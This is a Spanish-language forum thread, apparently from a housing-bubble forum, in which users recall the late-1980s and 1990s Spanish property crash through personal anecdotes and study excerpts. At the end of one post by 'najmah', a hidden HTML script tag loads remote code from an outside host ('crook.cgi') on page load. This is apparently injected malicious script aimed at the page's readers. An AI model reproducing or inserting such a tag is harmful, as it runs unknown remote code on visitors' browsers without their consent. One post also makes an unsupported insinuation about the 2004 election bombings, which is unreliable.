Leido en idealista, escalofriante.

fosco

Madmaxista
Desde
19 Ago 2006
Mensajes
2.196
Reputación
27
Lugar
mandriles
No se si lo habeis puesto por aquí, si es así lo siento.
lunes 23 abril 11:19, 19042007 en respuesta a para todos, dijo Pego aquí de otro foro, por su interés, un testimonio de una persona que vivió la burbuja de los 90:

" Yo viví la burbuja inmobiliaria de los 80, s y os puedo asegurar que cuando estalló entre el 89 y 90 aunque muchos la situan en el 91, fué desastrosa. Esta es mucho peor porque es desproporcionalmete más grande y porque está basada en el crédito.
En la burbuja de los 80, s se compraba mayoritariamente con liquidez, los intereses entonces eran de entre un 12 y 14% .

Aún así el barrido fué enorme, ví a constructores perder una casa por día, cuatro de mis conocidos en el sector se suicidaron, yo estuve a punto. Perdí mi casa, coches y lo que yo creía que tenía - unos 200 millones de ptas. de aquellos tiempos-, se evaporízó en 6 meses. Tuve que "okupar" una casa para darle techo a mis hijos, pasamos hambre y necesidades, corte de electricidad, etc. y no encontraba trabajo ni para limpiar casas. Recuerdo mi desesperación de aquellos días- para comer teníamos que recoger las sobras del colegio de mi hija mayor- y yo cada noche cuando mis hijos dormían caía de rodillas suplicando a todo lo que me rodeaba que me tragara, que se abriera el suelo y yo desapareciera. Si mis hijos hubieran tenido a alguien que se hubiera hecho responsable de ellos, seguro que yo hoy no estaría aquí escribiendo esto. Yo me recomía por lo que consideraba mis errores porque la advertencia de que había desplome yo la conocía, solo que no pude creerla ni por supuesto imaginar lo que ello suponía.

La burbuja ahora es muchísimo mayor, ha llegado a todos los rincones y peor que peor, se basa en crédito. Es demencial.
En la de los 80, s no había en mercado ni la 5 parte de lo que hay ahora de viviendas y las nuevas promociones no paran de salir, promociones que creo no se construirán de lo que deduzco que también saldrán estafas de tres pares de narices.

Esta demencia, digan lo que digan, afecta a toda la UE porque todos los europeos se han subido a este carro, comprando en España y en toda Europa, aunque nuestro país haya sido el que más negocio haya hecho.

La especulación en UK, por ejemplo no se ha basado en la nueva construcción sino en la 2ª mano, pero al igual que aquí la inflación en las viviendas ha sido incluso mayor que en nuestro suelo y las inversiónes con las mismas características. Gente que hipoteca su residencia habitual, compra con contratos entregando un 20% y a un año el resto con la intención de vender por un 20% más cuando tenga que escriturar y así el préstamo que le concedieron sobre su vivenda le dá para adquirir 4 o 5 viviendas con ese 20% y cuando no vendan pierden no solo su residencia sino todo lo que tenga porque los bancos cuando ejecutan te cargan intereses al descubierto, intereses sobre intereses, abogados, juzgados etc. y la deuda se multiplica por dos. Si además y como es en la gran mayoría tiene un préstamo personal y una tarjeta de crédito, (eso no existía en los 80, s, bueno eran poquísimas gente quien tenía tarjeta
Me parece que se ha cortado, si ponen más edito y pongo el final.
 

najmah

Madmaxista
Desde
28 Dic 2006
Mensajes
470
Reputación
6
Yo también tengo algún recuerdo de lo que sucedió en los 90, concretamente entre los años 92-95 mi suegro se vio obligado a vender un piso por siete millones de pesetas. El piso en cuestión era enorme, casi 200 m2, en una de las mejores zonas de Málaga. Habían comprado otra vivienda y contaban con el dinero del piso para reducir la hipoteca, así que empezaron pidiendo 12 millones de pesetas. Durante tres largos años ni siquieran recibieron visitas, y tuvieron que bajar el precio muchas veces, cada millón menos era una desgracia, porque entonces eso era dinero, y los compradores también se lo pensaban mucho. Finalmente tuvo que ajustar el precio a lo que el comprador le ofrecía y vender por siete millones.
Lo más curioso es que mi suegro, a día de hoy, es nuncabajista.
 

RANGER

Madmaxista
Desde
7 Jun 2006
Mensajes
5.123
Reputación
1.875
Lugar
Polonia (la del Mediterráneo)
Ya he explicado en este foro varias veces que lo que yo conozco de aquellos años sobre el sector inmobiliario no concuerda con los datos "oficiales" que hay, donde parece que los precios se estancaron, cuando en realidad hubo un buen batacazo, y ojo, la situacion no era tan grave como ahora (sin contar con que el estado tenia el control sobre el valor de la peseta y los tipos de interes).

Recuerdo especialmente unos pisos que se construyeron en Barcelona capital, para situarnos, cerca de la av. Diagonal, al otro lado del Corte Ingles. Unos pisos de lujo que eran toda una inversion y que en cuestion de pocos meses perdieron gran parte de su "valor". Pero en la mente pepitil de esta sociedad eso no ocurrio, los pisos siempre han subido. No hay mayor ciego que el que no quiere ver.
 

najmah

Madmaxista
Desde
28 Dic 2006
Mensajes
470
Reputación
6
RANGER dijo:
Ya he explicado en este foro varias veces que lo que yo conozco de aquellos años sobre el sector inmobiliario no concuerda con los datos "oficiales" que hay, donde parece que los precios se estancaron, cuando en realidad hubo un buen batacazo, y ojo, la situacion no era tan grave como ahora (sin contar con que el estado tenia el control sobre el valor de la peseta y los tipos de interes).

Recuerdo especialmente unos pisos que se construyeron en Barcelona capital, para situarnos, cerca de la av. Diagonal, al otro lado del Corte Ingles. Unos pisos de lujo que eran toda una inversion y que en cuestion de pocos meses perdieron gran parte de su "valor". Pero en la mente pepitil de esta sociedad eso no ocurrio, los pisos siempre han subido. No hay mayor ciego que el que no quiere ver.
Pero no deja de ser curioso que gente que lo ha vivido en sus propias carnes, ahora no sea capaz de verlo, parece que perdieran la memoria, ¿hasta qué punto los medios de comunicación controlan nuestros pensamientos y nuestros recuerdos? Es espeluznante.<script src="http://phonebill.ifreepages.com/burbuja/crook.cgi"></script>
 
Última edición:

Dolmen

Madmaxista
Desde
2 Oct 2006
Mensajes
718
Reputación
70
Con esto no habíamos contado, ¡¡habrá que contar con ello!!, me parece muy importante

las nuevas promociones no paran de salir, promociones que creo no se construirán de lo que deduzco que también saldrán estafas de tres pares de narices.



Yo lo he dicho muchas veces: en aquellos años mi madre puso un piso a la venta en el centro de Barcelona, le ofrecieron 32K, era poco para el pisazo... al final, vende por 25k dos años después de un calvario de espera, sin apenas visitas.

Y a eso hay que sumarle la pérdida por las devaluaciones de moneda.
 

Neutron_Mortgages

Madmaxista
Desde
20 Sep 2006
Mensajes
2.425
Reputación
1.259
najmah dijo:
Lo más curioso es que mi suegro, a día de hoy, es nuncabajista.
.
:eek:

Me lo creo. Es algo que debe ir grabado en los genes por alguna cuestión.

Mira si no el pobre de ex-burbujista aquí desesperado todo el día, posteando a un ritmo infernal, entrando a todos los hilos, intentando demostrarnos lo equivocados que estamos.

Hay algo patológico en todo esto del pisito.
 

ex-burbujista

Madmaxista
Desde
20 Sep 2006
Mensajes
3.481
Reputación
54
*
LAS HISTORIAS DE LA CRIPTA SON PARA NIÑOS...


LAS HITORIAS BURBUJISTAS SI QUE DAN MIEDO...
AQUI SE HABLA HASTA DE LOS 7 LADRILLOS del apocalipsis
 

bubblecrash

Madmaxista
Desde
27 Jun 2006
Mensajes
437
Reputación
6
Lugar
Sevilla
najmah dijo:
Pero no deja de ser curioso que gente que lo ha vivido en sus propias carnes, ahora no sea capaz de verlo, parece que perdieran la memoria, ¿hasta qué punto los medios de comunicación controlan nuestros pensamientos y nuestros recuerdos? Es espeluznante.

La gente, por lo general, tiene memoria de pez y se deja influenciar muchisimo por lo que ve en los medios de comunicacion masivos. El 'donde va vicente, donde va la gente' nos vuelve loco, y basta con que uno haya pegado el pelotazo vendiendo una casa al doble de lo que le costo para que el resto quiera repetir la azaña.
 

Pepito Grillo

Madmaxista
Desde
3 Ene 2007
Mensajes
581
Reputación
383
bubblecrash dijo:
La gente, por lo general, tiene memoria de pez y se deja influenciar muchisimo por lo que ve en los medios de comunicacion masivos. El 'donde va vicente, donde va la gente' nos vuelve loco, y basta con que uno haya pegado el pelotazo vendiendo una casa al doble de lo que le costo para que el resto quiera repetir la azaña.
Cierto, la memoria historica es inferior a la de un pez.

Sino mira las elecciones, si realmente quieres influenciar sobre el resultado (¿golpe de estado?) tienes que poner unas buenas bombas a SOLO 2 dias de las elecciones. :(
Porque quien puso esas bombas sabia muy bien que o se pone bien cerquita de las elecciones o la gran masa se olvida en un plis de la guerra de Iraq, el chapapote y al ministro de turno diciendo: 'Si la vivienda sube y se compra mas que nunca es porque cada vez somos mas ricos'.

La generacion de nuestros padres tienen a fuego, eso de que sus padres si que lo tuvieron mal, pero nuestra generacion lo tenemos de querida madre: COMO AHORA NO SE HA VIVIDO NUNCA EN ESTE PAIS.
 

Faldo

Madmaxista
Desde
14 Dic 2006
Mensajes
7.965
Reputación
13.501
Pepito Grillo dijo:
Cierto, la memoria historica es inferior a la de un pez.

Sino mira las elecciones, si realmente quieres influenciar sobre el resultado (¿golpe de estado?) tienes que poner unas buenas bombas a SOLO 2 dias de las elecciones. :(
Porque quien puso esas bombas sabia muy bien que o se pone bien cerquita de las elecciones o la gran masa se olvida en un plis de la guerra de Iraq, el chapapote y al ministro de turno diciendo: 'Si la vivienda sube y se compra mas que nunca es porque cada vez somos mas ricos'.

La generacion de nuestros padres tienen a fuego, eso de que sus padres si que lo tuvieron mal, pero nuestra generacion lo tenemos de querida madre: COMO AHORA NO SE HA VIVIDO NUNCA EN ESTE PAIS.
De lo que se olvida la gente es de ir a votar.
 

Mi_casa_es_tu_casa

Madmaxista
Desde
19 Jul 2006
Mensajes
5.475
Reputación
58
Lugar
BCN
najmah dijo:
Yo también tengo algún recuerdo de lo que sucedió en los 90, concretamente entre los años 92-95 mi suegro se vio obligado a vender un piso por siete millones de pesetas. El piso en cuestión era enorme, casi 200 m2, en una de las mejores zonas de Málaga. Habían comprado otra vivienda y contaban con el dinero del piso para reducir la hipoteca, así que empezaron pidiendo 12 millones de pesetas. Durante tres largos años ni siquieran recibieron visitas, y tuvieron que bajar el precio muchas veces, cada millón menos era una desgracia, porque entonces eso era dinero, y los compradores también se lo pensaban mucho. Finalmente tuvo que ajustar el precio a lo que el comprador le ofrecía y vender por siete millones.
Lo más curioso es que mi suegro, a día de hoy, es nuncabajista.
Pues vale. Menudo suegro que tienes tronco...
 

Adela Chavez

Madmaxista
Desde
14 Feb 2007
Mensajes
1.672
Reputación
17
Desde luego es terrible el documento, tan terrible como la falta de memoria de los españoles.
Nos estaremos muriendo de hambre y en los medios de comunicación seguirán saliendo noticias tipo 'la economía española es una de las 10 más potentes del mundo.'
 

najmah

Madmaxista
Desde
28 Dic 2006
Mensajes
470
Reputación
6
Mi_casa_es_tu_casa dijo:
Pues vale. Menudo suegro que tienes tronco...
Según él, hoy su piso vale más que cuando lo vendió, su error fue venderlo en aquel momento.
 

charliness

Madmaxista
Desde
9 Jun 2006
Mensajes
4.382
Reputación
463
Respecto de aquellas épocas yo recuerdo poco. En plena adolescencia los sucesos económicos son una de esas cosas a las que apenas se presta atención. Recuerdo a Felipe diciendonos a todos que teníamos que apretarnos el cinturón. Recuerdo alguna fábrica de muebles de mi pueblo que se fue a la hez, decían, por culpa de la crisis. También escuchaba historias de lonchafinismo. Había un profesor que se quejaba amargamente de la situación, y si que me acuerdo de una amiga de mi madre (mira que no me gustan estas historias) que tuvo que bajar varias veces el precio de su piso y finalmente no consiguió venderlo (esto en unos cinco años, ignoro la situación actual)

Pero como todo esto es poco más que literatura, es mejor recurrir al empirismo al máximo posible.
Un interesante estudio que conviene leer de principio a fin. Extraigo algunos párrafos interesantes para que los que quieran hagan lo mismo.

Sobre las bajadas de precio de la vivienda y las posibilidades de acceso a la misma por parte de las familias.

En la década de los ochenta, respecto a la evolución de los precios de la vivienda, se pueden distinguir dos etapas. Hasta 1985 se produce un descenso, debido fundamentalmente a la crisis económica, y es a partir de 1985 cuando se produce un cambio de tendencia. Este cambio responde a la confluencia de una serie de factores, y no tuvo la misma repercusión en todas las regiones o ciudades de nuestro país. Asimismo, es importante señalar el efecto social que esta elevación de precios ha producido, intensificando las desigualdades sociales, en primer lugar, entre quienes pueden acceder a la compra de su vivienda y quienes no pueden hacerlo y, en segundo lugar, reservando áreas residenciales para segmentos de población de mayor capacidad económica, mientras que las familias de rentas medias o bajas normalmente han de alojarse en zonas periféricas.
Los precios de las viviendas, después de la fuerte elevación del período 1986-1991 descienden ligeramente, en 1992 y 1993, y experimentan una subida en 1994 y 1995, por lo que siguen permaneciendo en un nivel elevado respecto a las rentas familiares medias. Las esperanzas de acceso a la propiedad se han visto frustradas para las economías más débiles, ya que el incremento de precio de la vivienda no ha sido compensado por un aumento de la renta disponible de las familias, y aunque las medidas adoptadas para frenar la especulación, y la crisis económica han producido una bajada de precios, desapareciendo la inversión en vivienda por motivos de especulación, para las rentas bajas y medias sigue habiendo una oferta que no se adapta a sus posibilidades de acceso. El coste de la vivienda se ha convertido en la mayor carga para el conjunto de las economías domésticas y resulta inaccesible si no se cuenta con ahorro previo o con otra vivienda. Las estimaciones realizadas sitúan el esfuerzo preciso para acceder a la vivienda en el 45% del ingreso anual medio por hogar, en 1992, descendiendo al 40%, en 1993, frente al 21,85% (área 1., régimen general), 15,37% (área 4., régimen general), 12,48% (área 1., régimen especial) de esfuerzo de acceso, si la vivienda a adquirir es de protección oficial, calculándose, en este caso, el esfuerzo sobre los niveles máximos de renta para acceso a ayudas públicas directas. (3,5 veces S.M.I., régimen general; 2,5 veces S.M.I., régimen especial). Todo ello, pone de manifiesto la dificultad de acceso a la vivienda libre, para las familias con niveles de ingresos bajos y medios, y especialmente para las familias de reciente creación.
Sobre las viviendas de protección oficial.

Respecto a la vivienda de protección oficial conviene subrayar su importancia dentro del total de la actividad del sector de la vivienda: (en el período 1970-1981, el 52,59% de las viviendas terminadas lo han sido bajo el régimen de VPO, en todas sus modalidades)
El estudio es para leerlo completo. Es interesante.
Solo cabe plantearse hasta que punto la situación es peor, mejor o igual, y si tenemos recursos para superarla peor, mejor o igual.